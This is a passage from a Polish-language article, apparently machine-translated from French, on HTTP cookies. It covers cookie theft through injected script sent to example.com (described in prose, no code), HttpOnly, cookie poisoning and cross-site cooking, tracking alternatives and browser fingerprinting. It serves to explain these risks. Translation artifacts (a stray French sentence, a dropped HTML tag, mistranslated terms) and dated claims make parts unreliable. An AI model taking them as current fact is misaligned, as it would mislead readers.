Gdy inny użytkownik kliknie ten link, przeglądarka wykona część kodu zawierającą atrybut onclick, więc zastępuje ciąg document.cookie listą plików cookie użytkownika, które są aktywne dla tej strony. Dlatego ta lista plików cookie jest wysyłana do serwera example.com, dzięki czemu osoba atakująca może gromadzić pliki cookie tego użytkownika.

Ten rodzaj ataku jest trudny do wykrycia po stronie użytkownika, ponieważ skrypt pochodzi z tej samej domeny, która ustawiła plik cookie, a operacja wysyłania wartości wydaje się być autoryzowana przez tę domenę. Uważa się, że obowiązkiem administratorów prowadzących tego typu strony jest wprowadzenie ograniczeń uniemożliwiających publikację złośliwego kodu.

Pliki cookie nie są bezpośrednio widoczne dla programów po stronie klienta, takich jak JavaScript, jeśli zostały wysłane z flagą HttpOnly. Z punktu widzenia serwera jedyną różnicą jest to, że w linii nagłówka Set-Cookie dodano nowe pole zawierające napis HttpOnly:

Set-Cookie: RMID=732423sdfs73242; expires=Fri, 31-Dec-2010 23:59:59 GMT; path=/; domain=.exemple.net; HttpOnly

Gdy przeglądarka otrzyma taki plik cookie, powinna go normalnie użyć w kolejnej wymianie HTTP, ale bez pokazywania go skryptom wykonywanym po stronie klienta. Flaga HttpOnly nie jest częścią żadnej oficjalnej specyfikacji technicznej i nie jest zaimplementowana we wszystkich przeglądarkach. Należy zauważyć, że obecnie nie ma sposobu, aby zapobiec odczytywaniu i zapisywaniu plików cookie sesji przez metodę XMLHTTPRequest.

Modyfikacja treści: osoba atakująca wysyła do serwera nieprawidłowy plik cookie, prawdopodobnie utworzony z prawidłowego pliku cookie wysłanego przez serwer.

Gdy tylko pliki cookie muszą być przechowywane i zwracane w niezmienionej postaci na serwer, osoba atakująca może zmodyfikować wartość plików cookie przed ich wysłaniem z powrotem na serwer. Na przykład, jeśli plik cookie zawiera całkowitą wartość, jaką użytkownik musi zapłacić za pozycje umieszczone w koszyku sklepu, zmiana tej wartości naraża serwer na ryzyko obciążenia atakującego kwotą niższą niż cena wywoławcza. Proces zmiany wartości plików cookies to tzw zatrucie ciasteczkami i może być używany po kradzieży plików cookie, aby atak był trwały.

W metodzie zastępowania plików cookie atakujący wykorzystuje usterkę przeglądarki, aby wysłać do serwera nieprawidłowy plik cookie.

Jednak większość stron internetowych przechowuje tylko identyfikator sesji — losowo wygenerowany unikalny numer służący do identyfikacji użytkownika sesji — w samym pliku cookie, podczas gdy wszystkie inne informacje są przechowywane na serwerze. W tym przypadku ten problem jest w dużej mierze rozwiązany.

Oczekuje się, że każda witryna będzie miała własne pliki cookie, więc jedna witryna nie powinna mieć możliwości modyfikowania ani tworzenia plików cookie powiązanych z inną witryną. Luka w zabezpieczeniach przeglądarki internetowej może pozwolić złośliwym witrynom na złamanie tej zasady. Eksploatacja takiej wady jest potocznie określana jako gotowanie w różnych lokalizacjach. Celem takich ataków może być kradzież identyfikatora sesji.

Użytkownicy powinni korzystać z najnowszych wersji przeglądarek internetowych, w których te luki są praktycznie wyeliminowane.

Stan konfliktu między klientem a serwerem

Korzystanie z plików cookie może generować sprzeczność między stanem klienta a stanem zapisanym w pliku cookie. Jeśli użytkownik uzyska plik cookie i kliknie przycisk „Wstecz” w przeglądarce, stan przeglądarki zasadniczo nie będzie taki sam jak przed tym pozyskaniem. Przykładowo jeżeli koszyk sklepu internetowego jest tworzony z wykorzystaniem plików cookies, to zawartość koszyka nie może ulec zmianie po powrocie do historii przeglądarki: jeżeli użytkownik naciśnie przycisk dodający artykuł do swojego koszyka i kliknie opcję „Powrót ", artykuł pozostaje w tym. Może to nie być intencją użytkownika, który z pewnością chce anulować dodanie artykułu. Może to prowadzić do zawodności, zamieszania i błędów. Dlatego twórcy stron internetowych powinni być świadomi tego problemu i wdrożyć środki, aby poradzić sobie z takimi sytuacjami.

Trwałe pliki cookie były krytykowane przez ekspertów ds. bezpieczeństwa prywatności za to, że nie wygasają wystarczająco wcześnie, co umożliwia stronom internetowym śledzenie użytkowników i budowanie ich profilu w czasie. Ten aspekt plików cookie jest również częścią problemu przejmowania sesji, ponieważ skradziony trwały plik cookie może służyć do podszywania się pod użytkownika przez znaczny okres czasu.

Aby przeczytać także: GAFAM: kim oni są? Dlaczego są (czasami) tak przerażające?

Alternatywy dla plików cookie

Niektóre operacje, które można wykonać przy użyciu plików cookie, mogą być również wykonywane przy użyciu innych mechanizmów, które omijają pliki cookie lub odtwarzają usunięte pliki cookie, co stwarza problemy prywatności w taki sam sposób (a czasem gorszy, bo wtedy niewidoczny) jak pliki cookie.

Adres IP

Użytkownicy mogą być śledzeni za pomocą adresu IP komputera wywołującego stronę. Ta technika jest dostępna od czasu wprowadzenia sieci World Wide Web, ponieważ podczas pobierania stron serwer żąda adresu IP komputera, na którym działa przeglądarka lub serwer proxy, jeśli żaden nie jest używany. Serwer może śledzić te informacje, niezależnie od tego, czy używane są pliki cookie. Adresy te są jednak zazwyczaj mniej niezawodne w identyfikowaniu użytkownika niż pliki cookie, ponieważ komputery i serwery proxy mogą być współużytkowane przez wielu użytkowników, a ten sam komputer może otrzymać inny adres IP podczas każdej sesji roboczej (jak to często bywa w przypadku połączeń telefonicznych). .

Śledzenie za pomocą adresów IP może być niezawodne w niektórych sytuacjach, na przykład w przypadku połączeń szerokopasmowych, które utrzymują ten sam adres IP przez długi czas, o ile włączone jest zasilanie.

Niektóre systemy, takie jak Tor, zostały zaprojektowane w celu zachowania anonimowości w Internecie i uniemożliwienia lub niepraktycznego śledzenia na podstawie adresu IP.

URL

Bardziej precyzyjna technika polega na osadzeniu informacji w adresach URL. Część ciągu zapytania w adresie URL to jedna z technik, która jest zwykle używana do tego celu, ale można również użyć innych części. Zarówno serwerlet Java, jak i mechanizmy sesyjne PHP używają tej metody, jeśli pliki cookie nie są włączone.

Ta metoda polega na dołączaniu przez serwer WWW żądań ciągu znaków do łączy do strony internetowej, która je przenosi, gdy są one wysyłane do przeglądarki. Gdy użytkownik podąża za linkiem, przeglądarka zwraca załączony ciąg zapytania do serwera.

Ciągi zapytań używane w tym celu i pliki cookie są bardzo podobne, zarówno jako informacje arbitralnie wybierane przez serwer, jak i zwracane przez przeglądarkę. Istnieją jednak pewne różnice: gdy adres URL zawierający ciąg zapytania jest ponownie używany, te same informacje są wysyłane do serwera. Na przykład, jeśli preferencje użytkownika są zakodowane w ciągu zapytania adresu URL, a użytkownik wyśle ​​ten adres URL innemu użytkownikowi pocztą e-mail, ten użytkownik będzie mógł również korzystać z tych preferencji.

Z drugiej strony, gdy użytkownik dwukrotnie uzyskuje dostęp do tej samej strony, nie ma gwarancji, że ten sam ciąg zapytania zostanie użyty za każdym razem. Na przykład, jeśli użytkownik trafia na stronę ze strony wewnętrznej witryny po raz pierwszy i ląduje na tej samej stronie ze strony zewnętrznej za drugim razem, ciąg zapytania odnoszący się do strony witryny jest zwykle inny, a pliki cookie są takie same .

Inne wady ciągów zapytań są związane z bezpieczeństwem: przechowywanie danych identyfikujących sesję w ciągach zapytań umożliwia lub upraszcza ataki utrwalania sesji, ataki referencyjne do identyfikatorów i inne exploity. Przekazywanie identyfikatorów sesji jako plików cookie HTTP jest bezpieczniejsze.

Ukryte pole formularza

Jedną z form śledzenia sesji, używaną przez ASP.NET, jest użycie formularzy internetowych z ukrytymi polami. Ta technika jest bardzo podobna do używania ciągów zapytań URL do przenoszenia informacji i ma te same zalety i wady; a jeśli formularz jest przetwarzany metodą HTTP GET, pola faktycznie stają się częścią adresu URL przeglądarki, która je wyśle ​​podczas przesyłania formularza. Jednak większość formularzy jest przetwarzana za pomocą HTTP POST, co powoduje, że informacje o formularzu, w tym ukryte pola, są dodawane jako dodatkowe dane wejściowe, które nie są ani częścią adresu URL, ani plikiem cookie.

Takie podejście ma dwie zalety z punktu widzenia śledzenia: po pierwsze, śledzenie informacji umieszczonych w kodzie źródłowym HTML i danych wejściowych POST, a nie w adresie URL, pozwoli przeciętnemu użytkownikowi uniknąć tego śledzenia; po drugie, informacje o sesji nie są kopiowane, gdy użytkownik kopiuje adres URL (na przykład w celu zapisania strony na dysku lub wysłania jej pocztą e-mail).

okno.nazwa

Wszystkie popularne przeglądarki internetowe mogą przechowywać dość duże ilości danych (od 2 MB do 32 MB) za pośrednictwem JavaScript przy użyciu właściwości window.name DOM. Te dane mogą być używane zamiast sesyjnych plików cookie i są również używane w różnych domenach. Technikę tę można połączyć z obiektami JSON w celu przechowywania złożonego zestawu zmiennych sesyjnych po stronie klienta.

Wadą jest to, że każde oddzielne okno lub karta będzie początkowo miała pusty plik window.name; podczas przeglądania po zakładkach (otwieranych przez użytkownika) oznacza to, że otwierane pojedynczo zakładki nie będą miały nazwy okna. Dodatkowo window.name może służyć do śledzenia odwiedzających w różnych witrynach, co może stanowić problem z prywatnością.

Pod pewnymi względami może to być bezpieczniejsze niż pliki cookie, ze względu na brak zaangażowania serwera, dzięki czemu jest on niewrażliwy na ataki sieciowe plików cookie sniffer. Jeśli jednak zostaną podjęte specjalne środki w celu ochrony danych, są one narażone na dalsze ataki, ponieważ dane są dostępne za pośrednictwem innych witryn otwartych w tym samym oknie.

Uwierzytelnianie HTTP

Protokół HTTP obejmuje podstawowe protokoły uwierzytelniania dostępu oraz skrót uwierzytelniania dostępu, który umożliwia dostęp do strony internetowej tylko wtedy, gdy użytkownik poda nazwę użytkownika i hasło. Jeśli serwer żąda certyfikatu w celu udzielenia dostępu do strony internetowej, przeglądarka żąda go od użytkownika, a po uzyskaniu go przechowuje i wysyła we wszystkich kolejnych żądaniach HTTP. Informacje te mogą służyć do śledzenia użytkownika.

Lokalny obiekt udostępniony

Jeśli przeglądarka zawiera wtyczkę Adobe Flash Player, plik lokalne obiekty współdzielone mogą być wykorzystywane w tym samym celu co pliki cookie. Mogą być atrakcyjnym wyborem dla twórców stron internetowych, ponieważ:

  • domyślny limit rozmiaru dla lokalnego obiektu udostępnionego wynosi 100 KB;
  • kontrole bezpieczeństwa są oddzielone od kontroli plików cookie użytkowników (tak więc lokalne obiekty współdzielone mogą być dozwolone, gdy pliki cookie nie są).

Ten ostatni punkt odróżnia zasady zarządzania plikami cookie od zasad dotyczących lokalnych obiektów udostępnionych firmy Adobe rodzi pytania dotyczące zarządzania przez użytkownika jego ustawieniami prywatności: musi on mieć świadomość, że zarządzanie przez niego plikami cookie nie ma wpływu na zarządzanie lokalnymi obiektami współdzielonymi i odwrotnie.

Inną krytyką tego systemu jest to, że można go używać tylko za pośrednictwem wtyczki Adobe Flash Player, która jest zastrzeżona, a nie standardem internetowym.

Trwałość po stronie klienta

Niektóre przeglądarki internetowe obsługują oparty na skryptach mechanizm trwałości, który umożliwia stronie przechowywanie informacji lokalnie do późniejszego wykorzystania. Na przykład Internet Explorer obsługuje trwałe informacje w historii przeglądarki, zakładkach, w formacie przechowywanym w XML lub bezpośrednio ze stroną internetową zapisaną na dysku. W przypadku przeglądarki Microsoft Internet Explorer 5 dostępna jest metoda danych użytkownika dostępna za pośrednictwem zachowań DHTML.

W3C wprowadziło w HTML 5 nowy interfejs API JavaScript do przechowywania danych po stronie klienta o nazwie Web storage i mający na celu trwałe zastąpienie plików cookie. Jest podobny do plików cookie, ale ma znacznie większą pojemność i nie przechowuje informacji w nagłówku żądań HTTP. Interfejs API pozwala na dwa rodzaje przechowywania w sieci: localstorage i sessionstorage, podobnie jak trwałe pliki cookie i sesyjne pliki cookie (z wyjątkiem tego, że sesyjne pliki cookie wygasają po zamknięciu przeglądarki podczas przechowywanie sesji wygasa po zamknięciu karty), odpowiednio. Pamięć sieciowa jest obsługiwana przez przeglądarki Mozilla Firefox 3.5, Google Chrome 5, Apple Safari 4, Microsoft Internet Explorer 8 i Opera 10.50.

Inny mechanizm zwykle opiera się na buforowaniu przeglądarki (w pamięci zamiast odświeżania) przy użyciu programów JavaScript na stronach internetowych. 

Na przykład strona może zawierać tag . La première fois que la page se charge, le programme exemple.js est aussi chargé. 

W tym momencie program pozostaje w pamięci podręcznej, a odwiedzana strona nie jest ponownie ładowana po raz drugi. W związku z tym, jeśli program zawiera zmienną globalną (na przykład var id = 3243242;), identyfikator ten pozostaje ważny i może zostać wykorzystany przez inny kod JavaScript po ponownym załadowaniu strony lub po załadowaniu strony łączącej program. 

Główną wadą tej metody jest to, że zmienna globalna JavaScript musi być statyczna, co oznacza, że ​​nie można jej zmienić ani usunąć jak pliku cookie.

odcisk palca przeglądarki internetowej

Odcisk palca przeglądarki to informacje gromadzone o ustawieniach konfiguracyjnych przeglądarki w celach identyfikacyjnych. Te odciski palców mogą służyć do pełnej lub częściowej identyfikacji użytkownika Internetu lub urządzenia, nawet jeśli pliki cookie są wyłączone.

Podstawowe informacje o konfiguracji przeglądarki internetowej są od dawna gromadzone przez usługi przeglądania stron internetowych w celu dokładnego pomiaru ruchu internetowego i wykrywania różnych form oszustw związanych z kliknięciami. Z pomocą języków skryptowych po stronie klienta zbieranie informacji jest znacznie dokładniejsze teraz możliwe.

Konwersja tych informacji na ciąg bitów tworzy odcisk palca urządzenia. W 2010 roku Electronic Frontier Foundation (EFF) zmierzyła entropię odcisku palca przeglądarki na co najmniej 18,1 bity, i to było zanim postępy w odciskach palców na płótnie dodały 5,7 bitów do tej entropii.

Ciasteczka w skrócie

Pliki cookie to małe pliki tekstowe zapisywane przez przeglądarkę internetową na twardym dysku osoby odwiedzającej witrynę, które służą (między innymi) do zapisywania informacji o odwiedzającym lub jego podróży po witrynie. Webmaster może w ten sposób rozpoznać zwyczaje odwiedzającego i spersonalizować prezentację swojej witryny dla każdego odwiedzającego; pliki cookie pozwalają zapamiętać, ile artykułów wyświetlić na stronie głównej, a nawet zachować dane logowania dla dowolnego podmiotu prywatnego: kiedy odwiedzający ponownie odwiedza witrynę, nie musi już wpisywać swojego imienia i hasła, aby zostać rozpoznane, ponieważ są one automatycznie odczytywane w pliku cookie.

Plik cookie ma ograniczoną żywotność, ustaloną przez projektanta witryny. Mogą również wygasnąć wraz z zakończeniem sesji w serwisie, co odpowiada zamknięciu przeglądarki. Pliki cookie są szeroko stosowane, aby ułatwić życie odwiedzającym i przedstawić im bardziej odpowiednie informacje. Ale specjalne techniki umożliwiają śledzenie odwiedzającego na kilku stronach, a tym samym gromadzenie i sprawdzanie krzyżowe bardzo obszernych informacji na temat jego nawyków. Dzięki tej metodzie wykorzystanie plików cookie zyskało reputację techniki inwigilacji, która narusza prywatność odwiedzających, co niestety w wielu przypadkach odpowiada rzeczywistości w przypadku użycia z przyczyn nietechnicznych lub niezgodnych z oczekiwaniami użytkowników.

W odpowiedzi na te uzasadnione obawy, HTML 5 wprowadza nowy JavaScript API do przechowywania danych po stronie klienta o nazwie Web storage, który jest znacznie bezpieczniejszy i ma większą pojemność, co ma na celu zastąpienie plików cookie.

Przechowywanie plików cookie

W niektórych przeglądarkach plik cookie można łatwo edytować, wystarczy prosty edytor tekstu, taki jak Notatnik, aby ręcznie zmienić jego wartości.

Pliki cookies zapisywane są w różny sposób w zależności od przeglądarki:

  • Microsoft Internet Explorer zapisuje każdy plik cookie w innym pliku;
  • Mozilla Firefox zapisuje wszystkie swoje pliki cookie w jednym pliku;
  • Opera zapisuje wszystkie swoje pliki cookie w jednym pliku i szyfruje je (nie można ich zmienić inaczej niż w opcjach oprogramowania);
  • Apple Safari zapisuje wszystkie swoje pliki cookie w jednym pliku z rozszerzeniem .plist. Modyfikacja jest możliwa, ale niezbyt łatwa, chyba że przejdziesz przez opcje oprogramowania.

Przeglądarki są wymagane do obsługi przynajmniej :

  • 300 jednoczesnych plików cookie;
  • 4 o na plik cookie;
  • 20 plików cookie na hosta lub domenę.
[Całkowity: 0 Mieć na myśli: 0]

Scenariusz Redaktorzy recenzji

Zespół redaktorów ekspertów spędza czas na badaniu produktów, przeprowadzaniu praktycznych testów, przeprowadzaniu wywiadów z profesjonalistami z branży, przeglądaniu recenzji konsumenckich i pisaniu wszystkich naszych wyników w formie zrozumiałych i wyczerpujących podsumowań.

Zostaw komentarz

Twoj adres e-mail nie bedzie opublikowany. Wymagane pola są oznaczone *

Co o tym myślisz?

384 Punkty
Upvote Odwołanie